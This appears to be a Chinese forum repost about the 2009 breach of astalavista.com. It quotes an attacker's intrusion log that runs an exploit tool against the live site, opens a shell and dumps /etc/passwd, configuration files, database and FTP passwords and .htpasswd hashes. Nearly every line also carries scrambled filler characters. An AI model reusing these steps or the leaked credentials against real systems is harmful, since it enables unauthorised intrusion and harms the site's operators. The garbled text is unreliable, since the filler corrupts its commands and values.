里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
3 Z. j# c% u9 q2 T6 a
" X- |' @, ]& B4 q1 o/ E[root@front3 ~]# curl -I litespeedtech.com
; S5 q3 A! u2 Z% o: |HTTP/1.1 200 OK6 O; W% M4 t. T! J$ v
Date: Fri, 05 Jun 2009 22:54:51 GMT/ F" x3 ~0 B; O+ U" W. K
Server: LiteSpeed
# N7 I$ a" \/ ?/ K
- H1 U- \: m5 M$ A. B* v另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
: m* a' d# D1 |( ]+ P$ [* f; `' |) ^
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。2 {' c( U9 m8 u4 L7 M
6 i0 i5 J# q8 p/ v( Y. `, I
2 f$ L6 w, m+ k: S7 F' }. Y/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
: {! F# ^2 |8 r, f d" }3 P/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \$ o2 W8 w1 i5 m; ?( B% w
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
: T/ l- q7 h$ H7 k) f) b# o" G+ E\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /7 T# B8 W; q/ B: O
\/ \/ \/ \/ \/ \/ \/
# O+ Y2 a1 n( f. u a. X The Hacking & Security Community! Y0 S7 U1 L8 A2 w, e* s
[+] Founded in 1997 by a hacker computer enthusiast/ z' G9 {9 {+ w H5 J+ o
[-] Exposed in 2009 by anti-sec group
* l" U3 `% z6 R( j+ v3 [ A6 A1 ^( a$ u! Y
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:! `" _$ P1 I4 `9 R
>> 03. Who’s behind the site?; J# J5 V/ Z1 W2 P6 r4 V
>>+ ~- i& [4 W1 U
>> A team of security and IT professionals, and a countless number of contributors from all over the world.' W7 D: t8 ~9 U' o4 T4 P4 V8 s
: ]8 O( o$ |8 \5 ]* N8 A& [
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?3 I* m# |4 y, z1 K9 M: K
>>
$ ?" D9 b3 E8 [+ I>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
, N6 h! s+ i9 B# ?( o8 j; N% nmilitary institutions.
7 m/ D$ j3 e ?, Q k6 D>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
1 R( N) D' @8 F8 @
9 [' N+ P3 E+ Z1 V: Z2 X- o% WWhy has Astalavista been targeted?' k1 Y1 R4 \0 }7 j
! w3 o8 r! u! o c* qOther than the fact that they are not doing any of this for the “community” but
P# D; h& L/ q9 P6 M( c% ffor the money, they spread exploits for kids, claim to be a security community4 | } Y5 O& g
(with no real sense of security on their own servers), and they charge you $6.66
b. ~& x3 a Cper months to access a dead forum with a directory filled with public releases
* z& I3 c: A+ F2 fand outdated / broken services.; |' v. x& G5 s2 X( d
4 h6 K ~! A8 Y2 n. i! ?2 p
We wanted to see how good that “team of security and IT professionals” really is.
: `( E" p( K4 o* n( O4 A7 V# F
) Y Y5 z9 h' ]Let’s begin.# d3 _3 L" p- ?6 p6 R
4 M: o% d9 d% h1 L* N
anti-sec:~# ./g0tshell astalavista.com -p 804 B t5 |( \2 U! ^ i
[+] Connecting to astalavista.com:80
* z o! S6 k9 v; r( Z- @[+] Grabbing banner…
6 n$ h; `7 Q9 F+ nLiteSpeed
7 ^8 O" b* Q7 v, F0 [5 ^2 ^[+] Injecting shellcode…
' l+ |1 m6 o! P5 R" h+ a0 I5 U' @[-] Wait for it
) F: S+ d% k: g' @; e4 X; W; a+ B: N# E3 y
[~] We g0tshell
' o1 ?4 P7 r0 q% C. k$ i/ juname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
" T. U& h, H* {/ q$ k9 e8 yID: uid=100(apache) gid=500(apache) groups=500(apache)
6 ?3 G3 F& ]) g4 ?' v! T, E# a q: a1 p( P! z& S3 N
sh-3.2$ cat /etc/passwd4 _4 f4 }3 ?5 q ]/ q
root:x:0:0:root:/root:/bin/bash/ w6 {! @9 @, Z
bin:x:1:1:bin:/bin:/sbin/nologin B' Y: t9 n) z" d5 I$ z- U
daemon:x:2:2:daemon:/sbin:/sbin/nologin
) M* w/ R2 {# F! oadm:x:3:4:adm:/var/adm:/sbin/nologin
: F+ T2 E4 e) K6 w! |% m# nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin) I3 X) D2 i. C8 o5 U9 i
sync:x:5:0:sync:/sbin:/bin/sync
R2 h2 N; [# z! Rshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown( _ R8 w5 K0 U' t
halt:x:7:0:halt:/sbin:/sbin/halt
5 L* w) s7 |0 d. n3 m5 hmail:x:8:12:mail:/var/spool/mail:/sbin/nologin. D8 h. M9 H) \! V6 t& G) a
news:x:9:13:news:/etc/news:
, U+ P& n+ e1 p& Y+ n1 M9 Uuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
5 L( Y8 z' w% B ~0 |' I; noperator:x:11:0 perator:/root:/sbin/nologin
) N$ f6 k$ Q/ z' mgames:x:12:100:games:/usr/games:/sbin/nologin {* N6 R3 F; k* X7 j+ `$ P
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
6 s# y' n w' M" F4 C6 X1 e6 ?. H5 Wftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
( a; q7 s2 _) [- Q; m% D. @& fnobody:x:99:99:Nobody:/:/sbin/nologin
5 J6 c! M6 P" b" E K5 V# Prpm:x:37:37::/var/lib/rpm:/sbin/nologin2 q' v( n' M& Q7 T$ E" X y2 g
dbus:x:81:81:System message bus:/:/sbin/nologin
" ]; T7 q: y2 g" c; ~nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
% Z6 g }2 p% W( L/ cmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
2 T f4 l' ^) c, ]smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin3 _4 C( W2 _+ \8 h4 v, \; ?- F6 Z
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
, f, `5 X! w1 d9 hhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- O4 S- H' R4 k9 zrpc:x:32:32 ortmapper RPC user:/:/sbin/nologin7 m& o }* S. Z1 Z4 Q+ S }
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin7 p0 ?9 A# {( h4 N9 l
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin" H9 G! f- a% P8 ]- b' Y0 K
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin) N- x4 a/ i; e8 Q
pcap:x:77:77::/var/arpwatch:/sbin/nologin
|6 i7 l( s, N6 m* h) Y3 mnamed:x:25:25:Named:/var/named:/sbin/nologin) D, D5 X _/ Q5 z' L4 C1 `! A8 Y
apache:x:100:500::/var/www:/bin/false6 [5 H& J& N. i" y
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
8 k% Z, N: {8 Q2 Q m9 ]mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
% p1 l4 c4 [) ?2 i5 B3 L4 W8 Cwebapps:x:500:501::/var/www/html:/bin/bash+ C* U: B/ E8 O/ t! y( O+ K
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
2 y2 F% T {0 l/ T$ t8 Tadmin:x:501:502::/home/admin:/bin/bash
) e b, S3 P: e2 ^$ U+ R" Djon:x:502:503::/home/jon:/bin/bash8 E1 X/ z: v3 i5 i% Z
com:x:503:504::/home/com:/bin/bash
; g8 ?& U. x, t+ I& ontp:x:38:38::/etc/ntp:/sbin/nologin
8 [4 t* M& r. ?* {6 aais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin3 Z' i' W$ n& g+ Q
astanet:x:504:505::/home/astanet:/bin/bash
( o' u* ~0 F7 q% t5 Y* V6 savahi:x:70:70:Avahi daemon:/:/sbin/nologin
8 Y6 k. ^, S D5 V! S) i8 yavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin# u) H7 b* A+ E- z$ j- }
5 D8 }; h7 ^; S9 [" g* b+ vsh-3.2$ cat /etc/hosts& M+ P" a5 X e z5 E/ m$ A. u
# Do not remove the following line, or various programs
, f9 X; G1 c0 O2 r# that require network functionality will fail.$ c- ]; H0 f8 v4 A9 i. v9 c
127.0.0.1 localhost.localdomain localhost
6 U6 ]9 U3 g# [* x::1 localhost6.localdomain6 localhost62 _' ]& F6 V N* e+ }
80.74.154.172 asta1.astalavistaserver.com
$ l+ Q1 r$ w) d# P- {# S+ N* Q
( U& J+ J) h4 \& Bsh-3.2$ pwd
5 \' n5 N* X4 `$ S( O/home/com/public_html
$ E. @6 S4 Q: O0 o' Q6 a' i. h6 v9 J
sh-3.2$ ls -la+ q# k6 c F& s4 C7 g t
total 18460! G! X5 r% p$ d
drwxr-xr-x 30 com apache 4096 May 28 17:06 .2 `; _$ @! W. G7 a" S
drwx–x–x 11 com com 4096 Jun 25 2008 ..
/ B- H/ S5 o& r6 @5 W7 wdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin( G5 U P, b3 S4 r' \& |
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache8 {& S/ i5 [* d8 A
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
! |- v* j" \8 Y$ ^, D: I3 V5 n" Adrwxrwxrwx 2 com com 4096 May 19 00:50 config
: _% E; ]. A" q9 W \drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
7 a* l' G, L. t3 x' J2 P* G; |* gdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules: G* O$ @& u' q0 s8 r
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
7 T& N8 B- R' _+ J9 Ydrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo. D& j$ E2 w9 ?8 ~" c
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__% }( P4 e( i x+ o
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php: |/ ?" n$ s' W
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd" @* D, m" f* W }4 X5 J
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
+ ]& G u8 N- E* G7 W8 v6 X1 B* r/ p-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico" G" D8 w7 b$ _0 u
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
5 G0 B/ g6 l. S8 J1 \5 U, X-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess6 s0 g% H' Y) h
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak+ P% W$ ~4 }( K8 {" _. M
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
! q L, {6 N$ Zdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
2 R: G* Y) U" j( s2 Fdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images1 C! u) B" E5 Z8 V* F; ^
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php' L1 C1 A n) Z: [% S' W
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
$ j( m2 H3 O% B' H5 o Cdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang, w+ V8 ]! i s1 E0 I
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
# S: I4 J9 O6 @2 rdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media6 q+ q, `* R, A
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
6 v0 ], v% e3 k, ~drwxr-xr-x 34 com com 4096 May 28 16:30 modules
" g# Y9 V' s1 Q# S9 Udrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
, W9 H) a( F5 h4 {4 Ydrwxrwxr-x 22 com com 4096 May 28 17:06 _new
8 L, U/ r4 h( D" _drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
5 i1 w* j! r: l9 ^* [- udrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy1 g* P1 C: G0 D s8 L* ~
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
/ O* q% {6 i2 k4 g+ ~4 g/ q* d-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
6 v- Q6 f2 T7 n: h% o1 G-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml. T7 w- Y2 ^5 R m( t7 u
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
I# `7 p- ^, Y$ V) } ^drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
1 ]" P* B; |7 y3 y* I) `7 A& Jdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
- P3 ~# Q8 e. I) ]" F5 zdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam* o d2 q% I8 e; Y6 s7 L9 o
% i% m% S, {* j3 u; [, m7 n
sh-3.2$ head -20 index.php# I7 y! a6 P6 V3 J7 j
<?php
1 [1 B' B* O+ \7 \+ A! V2 O
0 f4 F8 s8 |( Q0 t; x, c- s/**( ~: c! f* h7 n- L
* The main page for the CMS
* s: V* R+ k. P' m! x7 Q& c* @copyright CONTREXX CMS - COMVATION AG0 \, e6 l2 o, U7 |2 t
* @author Comvation Development Team2 d3 _% b6 T9 @2 H4 q3 ~
* @version v1.0.9.10.1 stable: o9 t* G0 |, y7 |- E! [7 C
* @package contrexx
, w- v' L, N# p: v \" b" k& c4 p5 Y* @subpackage core
6 j: e: F- D7 K3 g l' T5 y+ L* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
7 e* z8 {% P3 W+ {0 F/ A) c* @since v0.0.0.0
! r+ f) n5 D+ _4 E" t* @todo Capitalize all class names in project, u: O; ]$ n/ Q# I. T$ n
* @uses /config/configuration.php
. H9 A- M- @' X _: R( G. J* @uses /config/settings.php( U! F7 l) Q+ u4 L
* @uses /config/version.php: d$ X$ f; I' `% |' L" l* b
* @uses /core/API.php- X& b5 J1 t: X: [
* @uses /core_modules/cache/index.class.php
( T4 p% R- T% p* W. i* @uses /core/error.class.php4 `: ~& c3 M$ E/ X' C+ G, ~: S
* @uses /core_modules/banner/index.class.php
; p0 j/ C/ }& G, L& t s* @uses /core_modules/contact/index.class.php2 Z# C$ l" C2 P9 V( a7 e2 b7 }
: t, Q4 p- p6 e% r
sh-3.2$ cd config/4 S* y: Q& t9 @* s1 o! L
sh-3.2$ ls -la* P$ J& H7 v: e/ o6 j7 M
total 32* T$ p, t; V6 e, k
drwxrwxrwx 2 com com 4096 May 19 00:50 .
! n2 {+ f0 ]" j4 Bdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
& k2 V. N5 A3 Q+ ~& X% o9 j' z-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php- \9 V) q( o) T2 ~$ v
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php; h x: L. Y0 ~" a( g
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
- [# C) W. c, G/ i* I, v-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
* o f( o- i8 v! n( [
& `* c5 |8 |/ U4 f" R; h/ w0 ]& G: rsh-3.2$ cat configuration.php2 H! O, J0 f# F* D# y' I) A
[snip]) s# d+ S( g6 d
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost8 k8 T% U; z- @1 Q- J" U
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
0 g) W9 A# G; A H3 A: m2 L$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
8 @8 R' { m( g$ G0 z$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
( g2 Q1 a; h/ G9 K2 b/ x$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password! o% d/ o& k/ u9 s( `9 z
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)6 R- p+ O `6 r; a
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
$ l( a8 [5 `5 T* L# m[snip]
( A# L0 Q9 \# T. g$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
6 N* p+ @) N# r Q3 a& c$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
4 C- A. o9 i; V G& L" Y, X$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost) x; C6 v# k# \% b
$_FTPCONFIG['port'] = 21; // Ftp remote port2 M G$ |( J- k
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
3 Q3 r0 M& }3 z9 w5 n5 P" s9 ?$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
1 @! G: {/ X+ n2 j$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms5 R5 \, o& I4 l! I* J3 }
- L1 g/ Y+ _+ L' ush-3.2$ cd ..
0 Z* `8 F8 X, \, @& hsh-3.2$ cd dvd/+ A5 Y" v6 J9 X
sh-3.2$ ls -la
" c3 n3 K7 P( g( Ntotal 2913780' a$ z3 l. `( g& s+ ?0 z0 D ~( {
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
5 ^& S2 \ Q- W4 N# G6 s! w' Wdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
6 C. S: {+ \# c0 a: i; K m8 i9 c-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar3 ]% J" e- n) p
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar: _ w% u2 ?! ~
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar/ L7 n; H s! V4 Q, U3 \% h2 a# c' F
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
# s- m! T2 d. W" f" H
2 ^* T( X0 {1 N* C6 ush-3.2$ cat .htaccess' f9 M+ V- r) B2 g
authType Basic- l4 R j r. y- y+ k3 ^
authName DVD# C( p O8 q3 ^9 k9 U% A+ j
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
" m+ A$ W" |& j& w1 ^require valid-user" ]% M9 o; q: s' L
% c# q/ Q% D6 B% |. X8 ?5 x0 o+ E
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
1 @7 o, D, y* V' O, c6 e, hDVDdownload:CRD8cuY6.MPT6
. n# ] G- F1 w3 [; KDVDdownload2:CR8a36.wluFMg9 e* M9 w( W/ L" [+ i* K
5 N- p( k; H" L# r8 t, Y: ush-3.2$ cat test.php
. k& a2 v; Q& q8 _7 H: s) ^+ \<?php
. @. Y! H: }! O/ t: |! A$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;3 q2 i! O z: Z _
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));! c) m+ Q3 Z( s
echo $url;
3 V3 I' I& M! W1 ]1 z& y4 X7 c0 b?>" Y, z& ~+ x6 q% u5 O; I
/ k! l+ `& Q( N0 @; Xsh-3.2$ cd modifications/
1 U7 M4 N8 x1 U1 o6 ?8 ]sh-3.2$ ls -la
- `) z+ _# F+ R% z Jtotal 32
0 U t. l2 ^1 z2 xdrwxr-xr-x 8 com com 4096 May 11 12:48 .% N2 P& Z3 _8 ]+ k7 o; @3 v
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..0 z0 I. j2 V$ n: Q
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng$ r @! n4 c3 J/ I: I" r
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs- d' A4 j" o) }4 m9 o
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools# B9 B9 b7 S/ q4 L+ ?
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc' |/ o) U" s" a! S4 p
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search- {8 B; M5 ]9 n5 D, ?1 a% l7 j
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp5 M* ^8 E6 r1 m. t5 J4 Q/ R" X: b6 H* Z
/ }% @0 v- X2 B2 g' L$ tsh-3.2$ ls -R2 r: v K3 v) p3 H2 X: b% b. _
.:9 B9 e/ g/ z+ d1 u1 y6 Y
com_avtng cronjobs onlinetools pjirc search _tmp
/ I' Q; {3 x- @, L2 S- \3 p+ T0 g7 {$ w* i5 s- E ^2 n
./com_avtng:% O' o+ C1 V5 `/ D+ c- ]
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts \: G, x2 o; P! k" b+ m
1 A n! N Y, L./com_avtng/scripts:
% Y" C: K3 G: B8 X1 w* rpopunder.js8 {9 e0 m% J2 n/ Z+ r0 v
1 [: q l. d( R7 p" z% e* r7 Y
./cronjobs:
0 W8 s- N+ s8 l: b3 L+ gexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
1 a8 l3 g0 Z) c5 c" H2 `
* Y: i# P: Q; Z$ p% o8 V./cronjobs/tmp:
; x" i$ a" [1 ~# N4 G$ E' Kcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
$ D/ c% c( o8 \& A& A0 B, W0 H9 z, n2 c; g2 Q$ I5 F; P1 x0 b1 q
./onlinetools:
' T: E* x9 M) E Y O: b" windex.php% F: t3 B9 x9 a2 |
5 e# E$ N V0 `: j |$ W( P./pjirc:
; |& Y+ p! g6 h2 T6 I+ Ra_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt* u* ?4 V" j8 p4 Q) Q0 m' l/ t6 k
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt% t6 k( v* v% ^$ q
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd4 Y7 t! O+ `* b3 q3 O3 d
. C" o7 M! z6 f! s2 A" v: {
./pjirc/img:
% g& w0 \( V" X# aange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
0 A" p9 Y, b# X3 b5 B- q' c: f! c- parbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif $ E0 \5 X8 W. s* e0 [1 V
verre-eau.gif) _% ]6 n5 R9 q/ I
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif ' X Q( M1 d6 X# ^ H9 `0 ~
verre-vin.gif* j: O0 ]8 n, z! F: c+ C& o3 W
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif% x* t: a k* Q" l3 C% w) ~* k
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif5 H. U2 o( B: w3 T
W7 X1 m4 r+ f- h8 v./pjirc/snd:
& H: j% j; m/ g r( w! f. }bell2.au ding.au
' Z! n$ Q, J' {( Z [( h4 {/ C
2 m- u. ]& m8 A& Z+ y./search:# L0 b% Z4 Q5 z& e' k
searchEngines.php search.php
/ \- }) t7 B9 A. ]6 c; h- N j% V; O) [$ X2 |) t
./_tmp:- b" C Q7 Z3 M6 o, f/ }
defaultPorts.php defaultPorts.txt4 i+ q7 P r/ u: R% @
E% M; V @' U0 v
sh-3.2$ cd cronjobs/
3 P4 C$ h" I: V5 ]4 M" [% Esh-3.2$ cat exploits.php/ ^5 E* Y |; z
[snip], x8 l6 p: [& `$ x& R3 Q
$categories = array();
3 q6 ^: D4 E4 P, e+ l9 P, X# [8 a$ D$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
7 y5 I) Q+ q. |+ L$ q$expolits = file($milw0rmFile);
) R+ L, l; k: |3 Y$comExploits = array(); v+ V: |1 S# p1 _' |3 Z3 Y
[snip]
9 m) J: f+ M6 }' j: E' T$ t// manage data
! U6 K2 p6 z6 O6 a4 Vfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26408 n4 b( D2 p% ` m6 G1 e/ q) j
% p2 J3 N" J4 d9 e0 Z) I7 ^2 M // get path and title# ?9 Q& o7 Q- Z, [
$expolits[$x] = trim($expolits[$x]);
( S9 w% D5 Z# ^9 r $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));) e: j2 r; N! D1 d
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
" T' \- J, g3 a$ j7 \
' Y* a z0 e+ f& p9 X( \ // check if file exists$ ` a% e5 V2 M {$ P
if (file_exists($path)) {3 X! m9 u9 R0 x; |5 h7 M7 t
$ D- ^$ Y5 l# p9 M' ]4 g $text = file_get_contents($path);
! |# M+ ?7 m9 ^2 s" P8 Q" ?. H: ^1 A) g2 d; w3 z
// get content and date5 Q# n3 ^5 x7 j4 I2 m
//$text = htmlspecialchars($text, ENT_QUOTES);
5 N$ ^0 j$ c* c2 ?8 |7 z $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
! h% K8 t( G3 I j2 e if ($tmptext != ”) {
+ B9 W( f) S4 D4 k) r1 ^; A' ]2 M $text = $tmptext;$ g# O5 t5 [, Y' M: ~& r( v/ D
} else {
2 z' l% a7 u' v, V5 N- f$ K: H $text = addslashes(htmlentities($text, ENT_QUOTES));
( b; i) N) K' p' K. s4 P+ @: V }
3 F, \8 F8 J% d% O5 B1 X N $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
' j. n8 Z6 E8 E, J0 o' `+ p $tmp = explode('-', $date); I( P5 U7 o1 I) C# `
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
8 E3 P; d, K% D1 X+ E3 J3 `, E( | $cat = getCategory ($path);. n$ @) V9 J( o/ g1 Z; a
$ext = pathinfo(basename($path));, p/ Z+ l9 H+ [9 \: m& X$ D
$ext = $ext['extension'];0 ^# X" N- ^ n5 T+ z# e; g; t/ \. o8 B
$qStr = ”
! ], b! b: z% L" l2 }" d SELECT `id`8 L% D& A. L$ Y7 X+ e
FROM `contrexx_module_exploits`
s- `/ r/ ^ I. I/ G WHERE `title` = ‘” . $title . “‘
6 ]7 n9 J$ P& L1 p AND `date` = ‘” . $date . “‘
& e( P2 z- h; [& E+ j$ | n “;* H; U( t0 @9 T# I7 k5 q: C/ ]9 X* F
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;9 ^( \% w: F* q1 n1 U
$q = $_objDB->query($qStr);
$ u h- r: i6 Y+ i- X+ }( _% q8 g, J9 i) r4 w
if ($q->numRows() == 0) {
# l3 h/ \4 F; u+ I3 M, K. n1 S' W7 s0 V% u
// prepare array
0 |$ V$ |$ F8 u( y9 p$ U $comExploits[$x]['date'] = $date;
7 T0 a3 O2 J" K- I, c $comExploits[$x]['title'] = $title;* A" _6 d7 [# K$ Y0 _( f6 z4 Q
$comExploits[$x]['author'] = ‘milw0rm’;
( n% q3 ]4 U( j' |. M $comExploits[$x]['text'] = $text;$ n8 l) Z- v5 ]4 P
$comExploits[$x]['source'] = $ext;
# _6 l3 m4 u, F& r' W* h $comExploits[$x]['url1'] = ”;
7 T& x% T6 f+ ^" o3 O" }+ w $comExploits[$x]['url2'] = ”;" I: r4 u0 v( }- K
$comExploits[$x]['catid'] = $cat;
' O6 s0 f! _/ _+ B& Y4 u $comExploits[$x]['lang'] = ‘2′;$ p: r6 a. e7 o$ D+ Z$ ?, W$ D$ n% z
$comExploits[$x]['userid'] = ‘12′;
5 k, Q% o4 k- |2 H& d) e) l $comExploits[$x]['startdate'] = ‘0000-00-00′;. k- }# i s/ U6 p) {8 m
$comExploits[$x]['enddate'] = ‘0000-00-00′;# f% Q+ Y; C# ~
$comExploits[$x]['status'] = ‘1′;
) O9 i# C8 h" g# v/ P. m( {! j $comExploits[$x]['changelog'] = $date;
7 x9 y! e. u; |+ ~5 e. }' r. u8 q" F4 b/ l- g$ v
}
2 r+ u6 W) X6 z' N- |1 H" c[snip]5 \- i2 P; C5 o
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
! e a$ [. Y/ K9 c( F* q& z<rss version=”2.0″>
- {7 `. e* b# z4 K <channel>% c: k/ o* K# [; E/ f
<title>ASTALAVISTA.com - Exploits</title>
